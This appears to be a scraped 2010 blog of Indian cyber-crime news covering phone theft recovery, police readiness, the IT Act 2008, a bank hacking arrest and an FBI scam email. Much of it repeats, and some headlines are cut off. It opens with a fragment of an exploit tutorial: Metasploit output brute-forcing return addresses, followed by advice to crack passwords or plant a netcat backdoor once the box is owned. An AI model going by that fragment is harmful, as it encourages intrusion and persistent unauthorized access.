[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00420041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00430041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c10041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c30041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c90041...
[*] Sending request (65739 bytes)
If you are successful you'll have a remote connection into the target machine and can do whatever you want. Once you've done this and received the prompt for the other system you "own the box". I won't tell you what to do next, after all where is the fun in that. Don't trash the system too bad if you want to exploit it again. You might want to try to crack the passwords– or you can create your own netcat backdoor.
Metasploit™ – available from http://www.Metasploit™.com
It is not essential that the user boot a linux CD. To try out the framework on a Windows system, The Metasploit Project does provide a Windows installer on their web site.
Saturday, November 13, 2010
Cops say lost mobile phones can be easily recovered if police complaint is filed Read more: Cops say lost mobile phones can be easily recovered if po
CHENNAI : Most people who lose their mobile phone do not file a police complaint as they believe the chances of recovering their phone are minimal. However, according to the Chennai suburban police, it is almost certain that you would get back your phone if you file a police complaint with the International Mobile Equipment Identity (IMEI) number.
Suburban Police Commissioner S R Jangid said that on an average, about 150 mobile phones are either stolen or lost in Chennai or its suburbs everyday. In 2009 the police managed to recover 35 mobile phones valued at Rs. 3.25 lakh while this year till date 102 phones worth nearly Rs. 7 lakh have been recovered.
"We have had the support of service providers in locating stolen or lost cell phones without which it is very difficult to track lost phones," he said. "This is among other public services we focus on and our team has done a great job in tracking these devices'' Jangid added. The police commissioner urged people to call 9042400100 to report their missing mobile phones.
Of the 150 mobile phones lost daily, police said that about 50 instruments were stolen by pickpockets, about 30 snatched, and the remaining misplaced. A sizable number of complaints were received from bus passengers in the city suburbs, he added.
Those lodging complaints should furnish complete information including their name and address, model and make of the lost instrument, its number, e-mail address, date of loss and IMEI number. The IMEI number can be obtained by typing *#06# on a GSM mobile phone. The number can also be found beneath the battery. (The IMEI number is unique code encrypted on each genuine mobile phone that can help police track it anywhere in the country even if the SIM card is changed. Whenever a cell phone logs onto a network to make or receive calls, its IMEI number is emitted and gets registered. )
Read more: Cops say lost mobile phones can be easily recovered if police complaint is filed - The Times of India http://timesofindia.indiatimes.com/city/chennai/Cops-say-lost-mobile-phones-can-be-easily-recovered-if-police-complaint-is-filed/articleshow/6916445.cms#ixzz159jZmI9s
Suburban Police Commissioner S R Jangid said that on an average, about 150 mobile phones are either stolen or lost in Chennai or its suburbs everyday. In 2009 the police managed to recover 35 mobile phones valued at Rs. 3.25 lakh while this year till date 102 phones worth nearly Rs. 7 lakh have been recovered.
"We have had the support of service providers in locating stolen or lost cell phones without which it is very difficult to track lost phones," he said. "This is among other public services we focus on and our team has done a great job in tracking these devices'' Jangid added. The police commissioner urged people to call 9042400100 to report their missing mobile phones.
Of the 150 mobile phones lost daily, police said that about 50 instruments were stolen by pickpockets, about 30 snatched, and the remaining misplaced. A sizable number of complaints were received from bus passengers in the city suburbs, he added.
Those lodging complaints should furnish complete information including their name and address, model and make of the lost instrument, its number, e-mail address, date of loss and IMEI number. The IMEI number can be obtained by typing *#06# on a GSM mobile phone. The number can also be found beneath the battery. (The IMEI number is unique code encrypted on each genuine mobile phone that can help police track it anywhere in the country even if the SIM card is changed. Whenever a cell phone logs onto a network to make or receive calls, its IMEI number is emitted and gets registered. )
Read more: Cops say lost mobile phones can be easily recovered if police complaint is filed - The Times of India http://timesofindia.indiatimes.com/city/chennai/Cops-say-lost-mobile-phones-can-be-easily-recovered-if-police-complaint-is-filed/articleshow/6916445.cms#ixzz159jZmI9s
Friday, November 12, 2010
The state of cyber crime awareness amongst the law enforcement agencies
In an instance of a cyber crime investigation in India, a police officer was asked to seize the computer of the hacker. What he brought from the hacker’s premise was his monitor. In another similar instance, the police officials seized the memory and the CD-ROM drive of a hacker’s computer instead of taking out the hard disk.
If that doesn’t explain the state of cyber crime awareness amongst the law enforcement agencies, try reporting a cyber crime and most likely you will never think of contacting the police again for such an instance.
Today’s cyber attacks are not undertaken by amateur hackers who create viruses or malware to prove their worth or to showcase the vulnerabilities of government systems. There is a new economy emerging around cyber crime, which is sophisticated and organized.
In its Cybercrime Intelligence Report of 2009, Finjan shows the operations of the Golden Cash network consisting of an entire trading platform of malware-infested PCs. The trading platform utilizes all necessary components (buyer side, seller side, attack toolkit, and distribution via “partners”). This advanced trading platform marks a new milestone in the evolution of cyber crime.
By turning compromised PCs from a one-time source of profit into a digital asset that can be bought and sold again and again, cybercriminals are maximizing their illegal gains.
Another report from Symantec on the ‘Underground Economy’, highlights the kind of money these cyber criminals make. According to the report, Script (a well-known figure in the underground economy) and his associates were known for mass-producing counterfeit credit and debit cards, which they delivered internationally and used to withdraw cash.
This was so efficient that, at one point, those working with Script were reportedly earning up to $100,000 a day—significantly more than estimates of earnings on US-based forums. Script was arrested by Russian authorities in 2005.
Trends in cyber crime
The last few weeks have seen cyber attacks being carried out on many countries. Just a couple of weeks ago, it was reported that a widespread and unusual computer attack was launched on Web sites of several government agencies in the United States, including some that are responsible for fighting cyber crime as well.
In addition to this the last few days saw the Web sites of major South Korean government agencies, banks and Internet sites being paralyzed in a suspected cyber attack as well.
Analysts at Symantec pointed out that many of these attacks were offline. Vishal Dhupar, MD, Symantec India said, “We observed a number of malware components that were responsible for the attacks. W32.Dozer, Trojan.Dozer, W32.Mydoom.A@mm and W32.Mytob!gen work in tandem to both spread and attack.”
All these components of the attack are basically pieces of old malware code, which were bolted together to launch the attack. If these highly unsophisticated attacks were able to create such havoc, imagine what would happen if more sophisticated and better-coordinated attacks occur!
Yuval Ben-Itzhak, CTO of Finjan, opined, “The primary trend that we see is that hackers are using automatic tools to conduct crime. These automatic tools (toolkits) enable any person with some basic IT skills to start infecting online users with data-stealing malware within hours. Data stealing malware is what these criminals are using to cash out from their activities. They are selling the data they managed to steal online.”
Dr. Jose Nazario, Manager of Security Research, Arbor Networks, Inc. added, “We have seen, just like in physical criminal world, criminals who specialize in different things, criminals who burglar houses, criminals who buy and sell stolen property, there are conmen online too. This kind of specialization has existed in the physical world for thousands of years. Now it has appeared in the online world as well. So you have division of labor, and specialization in the online crime world.”
Dr. Nazario said, “If you are able to do a complete investigation of all the various actors involved in online crime such as DDoS attacks, economic espionage, or financial fraud, there would be many different parties who are enablers at different points in the process just as the people who are enablers of a crime in the physical world.
Long-standing physical crime organizations have moved heavily into online crime as it is extremely lucrative when compared to similar efforts in the physical world and the risk of being caught is lower. Victims can be global as opposed to local in the physical world. So the vast majority of online crime today is organized crime and a big proportion of it is being committed by traditional organized criminals.”
Indian criminals learn the ropes
There are many small groups of cyber criminals in India. We have not yet seen the emergence of a cyber crime mafia. However, most small-organized groups are located either in big cities or in small towns. This phenomenon hasn’t percolated to the countryside yet.
Most of these initially began as amateur activities and after tasting success, they went ahead with other cyber criminal activities. In the metros, and in the B class cities, we have seen the emergence of data brokers or data merchants who source data from people working with offshoring or outsourcing companies like the BPOs, KPOs and LPOs. Then these brokers go ahead and process the data before selling it. This is rampant.
Pavan Duggal, Advocate, Supreme Court of India and a noted cyber lawyer, said, “Cyber crime in India is going through a learning curve of maturity. Gone are the days when Indians would indulge in petty cyber crime activities such as defacing profiles or cyber stalking. What is emerging is a professional approach towards cyber crime.”
Cyber terrorism is another challenge in India. Ankit Fadia, an independent computer security and digital intelligence consultant, who is also a cyber terrorism expert, said, “During the investigations after the Mumbai attacks it was found that the terrorists were using VoIP to do all of their planning and communications. Before the Gujarat blasts, an e-mail was sent to a few news agencies in Mumbai. Both Gujarat and Mumbai police were inadequately equipped to track who sent the e-mail etc. I was working with the Gujarat police and the Navi Mumbai cyber cell department on both of these cases and after talking to them, I realized that they weren’t properly trained.
They asked me for tools and software that are basically downloadable from the Internet and that every hacker would know about. Together with my help and that of some other security consultants, we were able to track down the e-mail but then the problem was that the e-mail was sent from a Yahoo e-mail account and when the Mumbai cyber cell and ATS contacted Yahoo, it took about four-five days for Yahoo to get back on this as they needed approvals from their US office. This is too long a time when you are working on such a critical case.”
Indian Web sites are being hacked all the time just to demonstrate the vulnerabilities of these sites. Now with cyber terrorism coming in, although cyber terrorism has been termed a heinous offence with life imprisonment as the penalty, Duggal felt that many mechanisms needed to evolve pertaining to investigation and prosecution in cyber terrorism cases. It would be far better if India had a dedicated cyber crime force. Further, cyber crime related matters have to be given a fast track court rather than go to trial, a process that drags on for years.
According to Mikko Hypponen, Chief Research Officer, F-Secure Corporation, “India is not a major source of malware or cyber crime. However, it is a major target of such crime—mostly because of its size and emphasis on high tech. In the early days of computer viruses, India used to be a big source of viruses. That was the days of hobbyist virus writers. Nowadays, the large-scale organized criminal malware attacks are coming from Russia, China and Brazil.”
That said, cyber crime is not local; it is international. The criminals are in country A, stealing money from victims in countries B, C and D through computers in countries E, F and G. In order to get the criminal arrested and sentenced, you need cooperation from the law enforcement authorities in all of these countries. That doesn’t happen as smoothly as it should.
Call for Internetpol
The Internet has no borders and online crime is almost always international, yet local police authorities often have limited resources for investigations. According to Hypponen, we should consider the creation of an online version of Interpol – ‘Internetpol’ that is specifically tasked with targeting and investigating the top of the crimeware food chain.
“I’m not holding my breath waiting for this to happen overnight. In my talks with international law enforcement, everybody agrees we need more info sharing and more co-operation. However, getting all the necessary countries on board will be hard. Then we have to take into account the possible resistance from people who think such a ‘Net police’ would be used to curb free speech or hunt peer-to-peer users when what we would really be after would be catching online criminal gangs,” Hypponen said.
According to Fadia, “An organization like an Internetpol, which is an international body that operates on a cross-border investigation, is really required. The problem that every country faces today, is that even if you get trained officials to do the investigations for a cyber crime case, if the criminal is in another country, even if the agencies have all the proof, for them to be able to contact the local police agencies in the other country to even arrest the person is nearly impossible. No international agencies like the UN or the Interpol for Internet security currently exist. Every country wants to protect their own citizens, they would never cooperate in such an investigation.”
The IT Act 2008
In order to curb cyber crime and protect the country’s sovereign interests, the government has come up with the amended IT Act 2008. Duggal believed that while the amended Act has taken two steps forward, it has taken three steps back. So, while it has increased the coverage of cyber crimes in terms of covering crimes like cyber defamation, identity theft and cyber terrorism, the majority of cyber crimes, barring a few, have been made bailable.
Duggal said, “Once a person is out on bail, as a matter of right, he will immediately go and tamper with the electronic evidence. That being so, the chances of getting convictions in the cyber crime cases would further decrease. Therefore, to that extent, it is a piece of cyber crime friendly legislation.
Already statistics are not in India’s favor. We have got only four cyber crime convictions till date, which gives you an idea of how poor the law is. I think the actually number of convictions would further recede with the new cyber act because in any cyber crime case, conviction depends upon electronic evidence and if evidence is tampered, there will be no conviction. Therefore, I think the law has gone soft on cyber criminals, except for cyber terrorism, which has been made a heinous offense.”
Duggal explained, “The amendments have deleted the term ‘hacking’ from the law. This will have a psychologically negative impact. Cyber criminals today feel that hacking has been deleted from the law. Moreover, I think this soft approach is sending out a loud message to the world is that we are not focused on cyber crime. This would certainly hurt corporate India and the rate of growth of the Indian economy. So I think it would have been far better had the government gone for stringent punishments.
The world over, post 9/11, the focus has been on increasing the quantum of punishment for cyber crime in different jurisdictions. India is the only country that has acted to the contrary and reduced punishment for cyber crimes. For e.g. Under section 67, publishing obscene electronic information was earlier punishable with five years imprisonment and a Rs. 1 lakh fine on the first conviction and 10 years imprisonment and a Rs 2 lakhs fine for the second conviction. This has now been reduced from five years to three years and from 10 to 5 years. Similarly, all other punishments have been reduced. This doesn’t make any sense.”
Government officials, however, beg to differ. According to a senior official, the quantum of punishment has not been reduced in most cases. However, he admits that most offences under the IT Act 2008 have been made bailable, but argues that this is to serve a purpose. Consider a scenario where your system is infected with a virus through the Internet or through an infected pen drive etc.
In case you send an e-mail to a company, the virus would be sent along with it and the company can press charges against you of causing harm to their systems. Though you did it unknowingly, you can be proved guilty. Now, if this offense were treated seriously with a high quantum of punishment, a large number of innocent people would get convicted. This is one reason why all many offences have been made bailable under the amended IT Act.
Another reason, for making the offences bailable pertains to the fact that due to low awareness and knowledge about technology (amongst police, lawyers as well as the judges), cyber crime related cases take a long time to resolve. In such case, many petty offenders or innocent people are treated like hardcore criminals, which isn’t fair. That being said, a lot needs to be done to educate the law enforcement agencies about technology and cyber crime.
According to Jatin Sachdeva (CISSP, CISA), Information Security Specialist, Cisco India & SAARC, “As with any law, there is a constant need to evaluate relevance and context. Even with cyber crime laws in place in so many places around the world, it has not brought about the end of cyber crime. We believe that there is definitely more that can be done, and more importantly, more stakeholders to be brought into the ecosystem.”
Plan of action
Enhancing law is one issue, then the law needs to be properly implemented. There must be an appropriate orientation and awareness of how the law needs to be applied. Then there need to be fast track courts. Another major problem is the non citizen-friendly interface of the law enforcement agencies. Getting an FIR registered is a herculean task in any cyber crime case.
It is time for India to provide for electronic FIRs. Similarly, the criminal justice system needs to be appropriately reformed in India to keep in sync with the changing realities of the electronic economy.
The Indian Computer Emergency Response Team (CERT-In) is working with state police forces to train them on cyber investigations and cyber crime. However, CERT-In has certain limitations and it is up to the state police to contact CERT-In as the latter is ready to give money for setting up cyber forensic labs.
CERT-In is also trying to educate school students about the Dos and Don’ts of the Internet and create awareness amongst them about cyber crime. This is being currently done in association with Data Security Council of India, Nasscom and Google.
Sources from the government claim that India is well prepared to face any large-scale cyber attack. The government has also prepared a cyber crisis management plan, the contents of which are classified.
When it comes to enterprise security, things come down to deploying best current practices (BCPs). From the network, server and application standpoint, there are well-known BCPs out there that network operators, server administrators, Webmasters and so forth can follow to ensure that their systems and infrastructures are hardened against attacks.
Roland Dobbins, Solution Architect, Arbor Networks, opined, “A lot of these BCPs don’t consist of most of the things that you buy so much as the things that you do in your infrastructure. It requires time and effort to implement these things and a lot of folks for various reasons are under resourced and overworked so they don’t deploy these well-known best current practices that would not only make their sites more resilient against attacks but also provide greater visibility into the attacks and mitigate them.
One of the basic things that people can do is to ensure they have a virtual team comprising of their networking staff, their sysadmins and Web and database administrators, who can be called together and can work together. Another effective thing that they need to do is that they need to have an understanding as to who are your ISPs, who’s your operational security contact who can be reached out if there is a problem.
There are lot of reports where the folks didn’t know who their SPs were and how to go about contacting them. Many SPs offer commercial DDoS mitigation services that organizations can subscribe to. These act like insurance for your systems.”
All in all, we as a country need to develop a culture of security through proper training—be it at school level, college level or at organization level. As the Chinese philosopher, Confucius rightly said, “Success depends upon previous preparation, and without such preparation there is sure to be a failure.”
Reference : http://www.expresscomputeronline.com/20090803/market01.shtml
If that doesn’t explain the state of cyber crime awareness amongst the law enforcement agencies, try reporting a cyber crime and most likely you will never think of contacting the police again for such an instance.
Today’s cyber attacks are not undertaken by amateur hackers who create viruses or malware to prove their worth or to showcase the vulnerabilities of government systems. There is a new economy emerging around cyber crime, which is sophisticated and organized.
In its Cybercrime Intelligence Report of 2009, Finjan shows the operations of the Golden Cash network consisting of an entire trading platform of malware-infested PCs. The trading platform utilizes all necessary components (buyer side, seller side, attack toolkit, and distribution via “partners”). This advanced trading platform marks a new milestone in the evolution of cyber crime.
By turning compromised PCs from a one-time source of profit into a digital asset that can be bought and sold again and again, cybercriminals are maximizing their illegal gains.
Another report from Symantec on the ‘Underground Economy’, highlights the kind of money these cyber criminals make. According to the report, Script (a well-known figure in the underground economy) and his associates were known for mass-producing counterfeit credit and debit cards, which they delivered internationally and used to withdraw cash.
This was so efficient that, at one point, those working with Script were reportedly earning up to $100,000 a day—significantly more than estimates of earnings on US-based forums. Script was arrested by Russian authorities in 2005.
Trends in cyber crime
The last few weeks have seen cyber attacks being carried out on many countries. Just a couple of weeks ago, it was reported that a widespread and unusual computer attack was launched on Web sites of several government agencies in the United States, including some that are responsible for fighting cyber crime as well.
In addition to this the last few days saw the Web sites of major South Korean government agencies, banks and Internet sites being paralyzed in a suspected cyber attack as well.
Analysts at Symantec pointed out that many of these attacks were offline. Vishal Dhupar, MD, Symantec India said, “We observed a number of malware components that were responsible for the attacks. W32.Dozer, Trojan.Dozer, W32.Mydoom.A@mm and W32.Mytob!gen work in tandem to both spread and attack.”
All these components of the attack are basically pieces of old malware code, which were bolted together to launch the attack. If these highly unsophisticated attacks were able to create such havoc, imagine what would happen if more sophisticated and better-coordinated attacks occur!
Yuval Ben-Itzhak, CTO of Finjan, opined, “The primary trend that we see is that hackers are using automatic tools to conduct crime. These automatic tools (toolkits) enable any person with some basic IT skills to start infecting online users with data-stealing malware within hours. Data stealing malware is what these criminals are using to cash out from their activities. They are selling the data they managed to steal online.”
Dr. Jose Nazario, Manager of Security Research, Arbor Networks, Inc. added, “We have seen, just like in physical criminal world, criminals who specialize in different things, criminals who burglar houses, criminals who buy and sell stolen property, there are conmen online too. This kind of specialization has existed in the physical world for thousands of years. Now it has appeared in the online world as well. So you have division of labor, and specialization in the online crime world.”
Dr. Nazario said, “If you are able to do a complete investigation of all the various actors involved in online crime such as DDoS attacks, economic espionage, or financial fraud, there would be many different parties who are enablers at different points in the process just as the people who are enablers of a crime in the physical world.
Long-standing physical crime organizations have moved heavily into online crime as it is extremely lucrative when compared to similar efforts in the physical world and the risk of being caught is lower. Victims can be global as opposed to local in the physical world. So the vast majority of online crime today is organized crime and a big proportion of it is being committed by traditional organized criminals.”
Indian criminals learn the ropes
There are many small groups of cyber criminals in India. We have not yet seen the emergence of a cyber crime mafia. However, most small-organized groups are located either in big cities or in small towns. This phenomenon hasn’t percolated to the countryside yet.
Most of these initially began as amateur activities and after tasting success, they went ahead with other cyber criminal activities. In the metros, and in the B class cities, we have seen the emergence of data brokers or data merchants who source data from people working with offshoring or outsourcing companies like the BPOs, KPOs and LPOs. Then these brokers go ahead and process the data before selling it. This is rampant.
Pavan Duggal, Advocate, Supreme Court of India and a noted cyber lawyer, said, “Cyber crime in India is going through a learning curve of maturity. Gone are the days when Indians would indulge in petty cyber crime activities such as defacing profiles or cyber stalking. What is emerging is a professional approach towards cyber crime.”
Cyber terrorism is another challenge in India. Ankit Fadia, an independent computer security and digital intelligence consultant, who is also a cyber terrorism expert, said, “During the investigations after the Mumbai attacks it was found that the terrorists were using VoIP to do all of their planning and communications. Before the Gujarat blasts, an e-mail was sent to a few news agencies in Mumbai. Both Gujarat and Mumbai police were inadequately equipped to track who sent the e-mail etc. I was working with the Gujarat police and the Navi Mumbai cyber cell department on both of these cases and after talking to them, I realized that they weren’t properly trained.
They asked me for tools and software that are basically downloadable from the Internet and that every hacker would know about. Together with my help and that of some other security consultants, we were able to track down the e-mail but then the problem was that the e-mail was sent from a Yahoo e-mail account and when the Mumbai cyber cell and ATS contacted Yahoo, it took about four-five days for Yahoo to get back on this as they needed approvals from their US office. This is too long a time when you are working on such a critical case.”
Indian Web sites are being hacked all the time just to demonstrate the vulnerabilities of these sites. Now with cyber terrorism coming in, although cyber terrorism has been termed a heinous offence with life imprisonment as the penalty, Duggal felt that many mechanisms needed to evolve pertaining to investigation and prosecution in cyber terrorism cases. It would be far better if India had a dedicated cyber crime force. Further, cyber crime related matters have to be given a fast track court rather than go to trial, a process that drags on for years.
According to Mikko Hypponen, Chief Research Officer, F-Secure Corporation, “India is not a major source of malware or cyber crime. However, it is a major target of such crime—mostly because of its size and emphasis on high tech. In the early days of computer viruses, India used to be a big source of viruses. That was the days of hobbyist virus writers. Nowadays, the large-scale organized criminal malware attacks are coming from Russia, China and Brazil.”
That said, cyber crime is not local; it is international. The criminals are in country A, stealing money from victims in countries B, C and D through computers in countries E, F and G. In order to get the criminal arrested and sentenced, you need cooperation from the law enforcement authorities in all of these countries. That doesn’t happen as smoothly as it should.
Call for Internetpol
The Internet has no borders and online crime is almost always international, yet local police authorities often have limited resources for investigations. According to Hypponen, we should consider the creation of an online version of Interpol – ‘Internetpol’ that is specifically tasked with targeting and investigating the top of the crimeware food chain.
“I’m not holding my breath waiting for this to happen overnight. In my talks with international law enforcement, everybody agrees we need more info sharing and more co-operation. However, getting all the necessary countries on board will be hard. Then we have to take into account the possible resistance from people who think such a ‘Net police’ would be used to curb free speech or hunt peer-to-peer users when what we would really be after would be catching online criminal gangs,” Hypponen said.
According to Fadia, “An organization like an Internetpol, which is an international body that operates on a cross-border investigation, is really required. The problem that every country faces today, is that even if you get trained officials to do the investigations for a cyber crime case, if the criminal is in another country, even if the agencies have all the proof, for them to be able to contact the local police agencies in the other country to even arrest the person is nearly impossible. No international agencies like the UN or the Interpol for Internet security currently exist. Every country wants to protect their own citizens, they would never cooperate in such an investigation.”
The IT Act 2008
In order to curb cyber crime and protect the country’s sovereign interests, the government has come up with the amended IT Act 2008. Duggal believed that while the amended Act has taken two steps forward, it has taken three steps back. So, while it has increased the coverage of cyber crimes in terms of covering crimes like cyber defamation, identity theft and cyber terrorism, the majority of cyber crimes, barring a few, have been made bailable.
Duggal said, “Once a person is out on bail, as a matter of right, he will immediately go and tamper with the electronic evidence. That being so, the chances of getting convictions in the cyber crime cases would further decrease. Therefore, to that extent, it is a piece of cyber crime friendly legislation.
Already statistics are not in India’s favor. We have got only four cyber crime convictions till date, which gives you an idea of how poor the law is. I think the actually number of convictions would further recede with the new cyber act because in any cyber crime case, conviction depends upon electronic evidence and if evidence is tampered, there will be no conviction. Therefore, I think the law has gone soft on cyber criminals, except for cyber terrorism, which has been made a heinous offense.”
Duggal explained, “The amendments have deleted the term ‘hacking’ from the law. This will have a psychologically negative impact. Cyber criminals today feel that hacking has been deleted from the law. Moreover, I think this soft approach is sending out a loud message to the world is that we are not focused on cyber crime. This would certainly hurt corporate India and the rate of growth of the Indian economy. So I think it would have been far better had the government gone for stringent punishments.
The world over, post 9/11, the focus has been on increasing the quantum of punishment for cyber crime in different jurisdictions. India is the only country that has acted to the contrary and reduced punishment for cyber crimes. For e.g. Under section 67, publishing obscene electronic information was earlier punishable with five years imprisonment and a Rs. 1 lakh fine on the first conviction and 10 years imprisonment and a Rs 2 lakhs fine for the second conviction. This has now been reduced from five years to three years and from 10 to 5 years. Similarly, all other punishments have been reduced. This doesn’t make any sense.”
Government officials, however, beg to differ. According to a senior official, the quantum of punishment has not been reduced in most cases. However, he admits that most offences under the IT Act 2008 have been made bailable, but argues that this is to serve a purpose. Consider a scenario where your system is infected with a virus through the Internet or through an infected pen drive etc.
In case you send an e-mail to a company, the virus would be sent along with it and the company can press charges against you of causing harm to their systems. Though you did it unknowingly, you can be proved guilty. Now, if this offense were treated seriously with a high quantum of punishment, a large number of innocent people would get convicted. This is one reason why all many offences have been made bailable under the amended IT Act.
Another reason, for making the offences bailable pertains to the fact that due to low awareness and knowledge about technology (amongst police, lawyers as well as the judges), cyber crime related cases take a long time to resolve. In such case, many petty offenders or innocent people are treated like hardcore criminals, which isn’t fair. That being said, a lot needs to be done to educate the law enforcement agencies about technology and cyber crime.
According to Jatin Sachdeva (CISSP, CISA), Information Security Specialist, Cisco India & SAARC, “As with any law, there is a constant need to evaluate relevance and context. Even with cyber crime laws in place in so many places around the world, it has not brought about the end of cyber crime. We believe that there is definitely more that can be done, and more importantly, more stakeholders to be brought into the ecosystem.”
Plan of action
Enhancing law is one issue, then the law needs to be properly implemented. There must be an appropriate orientation and awareness of how the law needs to be applied. Then there need to be fast track courts. Another major problem is the non citizen-friendly interface of the law enforcement agencies. Getting an FIR registered is a herculean task in any cyber crime case.
It is time for India to provide for electronic FIRs. Similarly, the criminal justice system needs to be appropriately reformed in India to keep in sync with the changing realities of the electronic economy.
The Indian Computer Emergency Response Team (CERT-In) is working with state police forces to train them on cyber investigations and cyber crime. However, CERT-In has certain limitations and it is up to the state police to contact CERT-In as the latter is ready to give money for setting up cyber forensic labs.
CERT-In is also trying to educate school students about the Dos and Don’ts of the Internet and create awareness amongst them about cyber crime. This is being currently done in association with Data Security Council of India, Nasscom and Google.
Sources from the government claim that India is well prepared to face any large-scale cyber attack. The government has also prepared a cyber crisis management plan, the contents of which are classified.
When it comes to enterprise security, things come down to deploying best current practices (BCPs). From the network, server and application standpoint, there are well-known BCPs out there that network operators, server administrators, Webmasters and so forth can follow to ensure that their systems and infrastructures are hardened against attacks.
Roland Dobbins, Solution Architect, Arbor Networks, opined, “A lot of these BCPs don’t consist of most of the things that you buy so much as the things that you do in your infrastructure. It requires time and effort to implement these things and a lot of folks for various reasons are under resourced and overworked so they don’t deploy these well-known best current practices that would not only make their sites more resilient against attacks but also provide greater visibility into the attacks and mitigate them.
One of the basic things that people can do is to ensure they have a virtual team comprising of their networking staff, their sysadmins and Web and database administrators, who can be called together and can work together. Another effective thing that they need to do is that they need to have an understanding as to who are your ISPs, who’s your operational security contact who can be reached out if there is a problem.
There are lot of reports where the folks didn’t know who their SPs were and how to go about contacting them. Many SPs offer commercial DDoS mitigation services that organizations can subscribe to. These act like insurance for your systems.”
All in all, we as a country need to develop a culture of security through proper training—be it at school level, college level or at organization level. As the Chinese philosopher, Confucius rightly said, “Success depends upon previous preparation, and without such preparation there is sure to be a failure.”
Reference : http://www.expresscomputeronline.com/20090803/market01.shtml
Kandivli businessman in connection with a cheating and hacking case
The cyber crime cell of the Bangalore police last week arrested a Kandivli businessman in connection with a cheating and hacking case registered there.
The accused, Yashwant Mairale (39), is a resident of Kandivli. Mumbai police sources confirmed that they assisted the Bangalore team, headed by S S Muddegowda, which had come in search of Mairale. He was produced before the Ballard Pier court by the Bangalore cops, seeking his transfer warrant. He will be produced before the first class magistrate court i Bangalore on Friday.
The case pertains to a complaint of cheating by S Rangaswamy, a resident of Bangalore, who alleged that some one had hacked into his ICICI e-banking account and stolen Rs 2.50 lakh. When he checked the account in December last year, he was shocked to discover that Rs 2.50 lakh was transferred into three accounts.
A case of cheating was registered by the Cantonment police. But as it pertained to a hacking offence, the case was transferred to the CID’s cyber cell. During investigations, the police found that one of the beneficiaries, Sukresh Das, had an account the SBI’s branch in West Bengal.
But the police were unable to trace any such person. However, they found that Rs 50,000 was transferred into Mairale’s account in Mumbai
The accused, Yashwant Mairale (39), is a resident of Kandivli. Mumbai police sources confirmed that they assisted the Bangalore team, headed by S S Muddegowda, which had come in search of Mairale. He was produced before the Ballard Pier court by the Bangalore cops, seeking his transfer warrant. He will be produced before the first class magistrate court i Bangalore on Friday.
The case pertains to a complaint of cheating by S Rangaswamy, a resident of Bangalore, who alleged that some one had hacked into his ICICI e-banking account and stolen Rs 2.50 lakh. When he checked the account in December last year, he was shocked to discover that Rs 2.50 lakh was transferred into three accounts.
A case of cheating was registered by the Cantonment police. But as it pertained to a hacking offence, the case was transferred to the CID’s cyber cell. During investigations, the police found that one of the beneficiaries, Sukresh Das, had an account the SBI’s branch in West Bengal.
But the police were unable to trace any such person. However, they found that Rs 50,000 was transferred into Mairale’s account in Mumbai
Accused Anand Bilore created a fake profile of his workmate on the social networking site, and sent obscene messages from it to female colleagues in t
With internet users becoming aware about email scams, fraudsters have upped their game and are using ingenious methods to extract money from unsuspecting netizens.
The latest fraud email doing the rounds lists the Federal Bureau of Investigation (FBI) as the sender. The email offers to refund money you may have lost in an internet fraud in the past. But don’t hit the ‘reply’ button with your personal details. All these emails are fake. To make the emails look authentic, the fraudsters have provided the address of the FBI headquarters at Washington DC along with the investigating department. The National Association of Software and Service Companies (Nasscom) has written to the FBI, asking the agency to look into the matter.
The email is written by one Thomas Green who claims to be an agent with the FBI’s Internet Crime Complaint Center. The email states that six people have been arrested in connection with an email fraud, where they duped recipients into parting with money. A part of the amount, approximately US $ 2.5 lakh, has been recovered and can be refunded to the fraud victims through an ATM card, the email states. The card will be dispatched after the recipient provides personal information to another agent, Fredy Simon,the email adds.
“A month ago, I received a similar email, where the sender said he represented the United Nations and a committee had been created to refund money to victims of a phishing fraud. The email carried the UN logo and pictures of the secretary-general,’’ said technology evangelist Vijay Mukhi. “It’s best to delete such emails,” he added.
“This is a variation of the Nigerian scam,’’ said Pratap Reddy, director of cyber security at Nasscom. “If you haven’t lodged a police complaint, there’s no question of being contacted by an agency. If a complaint has been lodged, then a foreign agency like the FBI will have to go through proper diplomatic channels such as the Interpol. State CID is the nodal agency that would co-ordinate. The FBI will never approach an Indian citizen directly,’’ Reddy added.
The latest fraud email doing the rounds lists the Federal Bureau of Investigation (FBI) as the sender. The email offers to refund money you may have lost in an internet fraud in the past. But don’t hit the ‘reply’ button with your personal details. All these emails are fake. To make the emails look authentic, the fraudsters have provided the address of the FBI headquarters at Washington DC along with the investigating department. The National Association of Software and Service Companies (Nasscom) has written to the FBI, asking the agency to look into the matter.
The email is written by one Thomas Green who claims to be an agent with the FBI’s Internet Crime Complaint Center. The email states that six people have been arrested in connection with an email fraud, where they duped recipients into parting with money. A part of the amount, approximately US $ 2.5 lakh, has been recovered and can be refunded to the fraud victims through an ATM card, the email states. The card will be dispatched after the recipient provides personal information to another agent, Fredy Simon,the email adds.
“A month ago, I received a similar email, where the sender said he represented the United Nations and a committee had been created to refund money to victims of a phishing fraud. The email carried the UN logo and pictures of the secretary-general,’’ said technology evangelist Vijay Mukhi. “It’s best to delete such emails,” he added.
“This is a variation of the Nigerian scam,’’ said Pratap Reddy, director of cyber security at Nasscom. “If you haven’t lodged a police complaint, there’s no question of being contacted by an agency. If a complaint has been lodged, then a foreign agency like the FBI will have to go through proper diplomatic channels such as the Interpol. State CID is the nodal agency that would co-ordinate. The FBI will never approach an Indian citizen directly,’’ Reddy added.
Jealous colleague turns to Orkut for revenge, arrested
Accused Anand Bilore created a fake profile of his workmate on the social networking site, and sent obscene messages from it to female colleagues in the company
There is nothing called healthy competition at the workplace. Especially if at stake is a coveted ‘best employee’ award, a promotion and the promise of a better life.
Allegedly driven by professional jealousy, an assistant manager with Kotak Life Insurance created a fake Orkut profile of his colleague with the intention of discrediting him. Thane’s Cyber Crime Cell arrested him and his associate on Tuesday after he used the social networking profile to send obscene messages to the female colleagues. The accused, Anand Ishwar Bilore, 21, and his associate, Vishal Changani, 23, an estate agent are from Chembur.
